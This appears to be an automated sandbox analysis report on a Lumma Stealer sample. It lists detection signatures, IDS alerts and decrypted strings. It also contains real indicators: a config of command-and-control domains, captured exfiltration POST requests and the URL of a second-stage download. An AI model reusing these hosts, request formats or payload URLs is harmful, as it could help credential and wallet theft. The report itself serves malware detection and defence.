Windows Analysis Report
BJQizQ6sqT.exe

Overview

General Information

Sample name: BJQizQ6sqT.exe (renamed because original name is a hash value)
Original sample name: daed40d82d8d43f2ad0be3fb944c99a3.exe
Analysis ID: 1579796
MD5: daed40d82d8d43f2ad0be3fb944c99a3
SHA1: 00a4b14b4e574ac6e5c1136b0ee9789c3cf26b61
SHA256: ac43fe948b1c2c1039fb007c8ca7da8575b1ffa60b5bcd4de626fc9dc7aa55fa
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • BJQizQ6sqT.exe (PID: 4140 cmdline: "C:\Users\user\Desktop\BJQizQ6sqT.exe" MD5: DAED40D82D8D43F2AD0BE3FB944C99A3)
    • WerFault.exe (PID: 1268 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "greywe-snotty.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou"], "Build id": "LOGS11--LiveTraffic"}
Source                                          Rule                           Description                       Author        Strings
sslproxydump.pcap                               JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
sslproxydump.pcap                               JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
Process Memory Space: BJQizQ6sqT.exe PID: 4140  JoeSecurity_CredentialStealer  Yara detected Credential Stealer  Joe Security
Process Memory Space: BJQizQ6sqT.exe PID: 4140  JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
Process Memory Space: BJQizQ6sqT.exe PID: 4140  JoeSecurity_LummaCStealer      Yara detected LummaC Stealer      Joe Security
decrypted.memstr                                JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security

No Sigma rule has matched
Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-23T09:16:41.578258+0100  2028371  3         Unknown Traffic                                192.168.2.6  49721        172.67.150.173  443               TCP
2024-12-23T09:16:43.576322+0100  2028371  3         Unknown Traffic                                192.168.2.6  49722        172.67.150.173  443               TCP
2024-12-23T09:16:46.568277+0100  2028371  3         Unknown Traffic                                192.168.2.6  49727        172.67.150.173  443               TCP
2024-12-23T09:16:49.148799+0100  2028371  3         Unknown Traffic                                192.168.2.6  49728        172.67.150.173  443               TCP
2024-12-23T09:16:51.897153+0100  2028371  3         Unknown Traffic                                192.168.2.6  49739        172.67.150.173  443               TCP
2024-12-23T09:16:54.597336+0100  2028371  3         Unknown Traffic                                192.168.2.6  49746        172.67.150.173  443               TCP
2024-12-23T09:16:57.153372+0100  2028371  3         Unknown Traffic                                192.168.2.6  49752        172.67.150.173  443               TCP
2024-12-23T09:17:02.105430+0100  2028371  3         Unknown Traffic                                192.168.2.6  49763        172.67.150.173  443               TCP
2024-12-23T09:17:04.644220+0100  2028371  3         Unknown Traffic                                192.168.2.6  49769        185.166.143.48  443               TCP
2024-12-23T09:17:07.061631+0100  2028371  3         Unknown Traffic                                192.168.2.6  49776        3.5.29.90       443               TCP
2024-12-23T09:16:42.339574+0100  2054653  1         A Network Trojan was detected                  192.168.2.6  49721        172.67.150.173  443               TCP
2024-12-23T09:16:44.341927+0100  2054653  1         A Network Trojan was detected                  192.168.2.6  49722        172.67.150.173  443               TCP
2024-12-23T09:17:02.919814+0100  2054653  1         A Network Trojan was detected                  192.168.2.6  49763        172.67.150.173  443               TCP
2024-12-23T09:16:42.339574+0100  2049836  1         A Network Trojan was detected                  192.168.2.6  49721        172.67.150.173  443               TCP
2024-12-23T09:16:44.341927+0100  2049812  1         A Network Trojan was detected                  192.168.2.6  49722        172.67.150.173  443               TCP
2024-12-23T09:16:47.622739+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.6  49727        172.67.150.173  443               TCP

AV Detection

Source: BJQizQ6sqT.exe | Avira: detected
Source: BJQizQ6sqT.exe.4140.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "greywe-snotty.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou"], "Build id": "LOGS11--LiveTraffic"}
Source: BJQizQ6sqT.exe | ReversingLabs: Detection: 60%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: BJQizQ6sqT.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor (one decrypted string per line):
  pollution-raker.cyou
  hosue-billowy.cyou
  ripe-blade.cyou
  smash-boiling.cyou
  supporse-comment.cyou
  greywe-snotty.cyou
  steppriflej.xyz
  sendypaster.xyz
  cuddlyready.xyz
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  LOGS11--LiveTraffic
Source: BJQizQ6sqT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.5.29.90:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: C:\Users\user\Desktop\BJQizQ6sqT.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49721 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49721 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49722 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49722 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49727 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49763 -> 172.67.150.173:443
Source: Malware configuration extractor | URLs: supporse-comment.cyou, steppriflej.xyz, greywe-snotty.cyou, ripe-blade.cyou, cuddlyready.xyz, hosue-billowy.cyou, smash-boiling.cyou, sendypaster.xyz, pollution-raker.cyou
Source: DNS query: cuddlyready.xyz
Source: Joe Sandbox View | IP Address: 185.166.143.48
Source: Joe Sandbox View | IP Address: 172.67.150.173
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49727 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49746 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49776 -> 3.5.29.90:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 185.166.143.48:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3Y5WVLYMON | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12817 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YHM4QLNTIXGPL8F56EK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15117 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=A3I60YPXCY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19921 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=OSG0OVPTVU5Q | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1227 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BEW3OHZ1B | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 552416 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 88 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cuddlyready.xyz
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368237256.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi6
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468878619.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543983298.0000000006029000.00000002.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468837205.00000000058F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49752 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49763 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 3.5.29.90:443 -> 192.168.2.6:49776 version: TLS 1.2

              System Summary

              Source: BJQizQ6sqT.exe Static PE information: section name:
              Source: BJQizQ6sqT.exe Static PE information: section name: .rsrc
              Source: BJQizQ6sqT.exe Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Code function: 0_3_00FE9050 0_3_00FE9050
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Code function: 0_3_00FEE8AE 0_3_00FEE8AE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
              Source: BJQizQ6sqT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: BJQizQ6sqT.exe Static PE information: Section: ZLIB complexity 0.9973980629280822
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4140
              Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f02c9ff4-7532-42dd-81f9-e87baf15220e
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212610470.0000000005905000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2237508619.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2213013718.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2237963624.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BJQizQ6sqT.exe ReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File read: C:\Users\user\Desktop\BJQizQ6sqT.exe
              Source: unknown Process created: C:\Users\user\Desktop\BJQizQ6sqT.exe "C:\Users\user\Desktop\BJQizQ6sqT.exe"
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: rasadhlp.dll
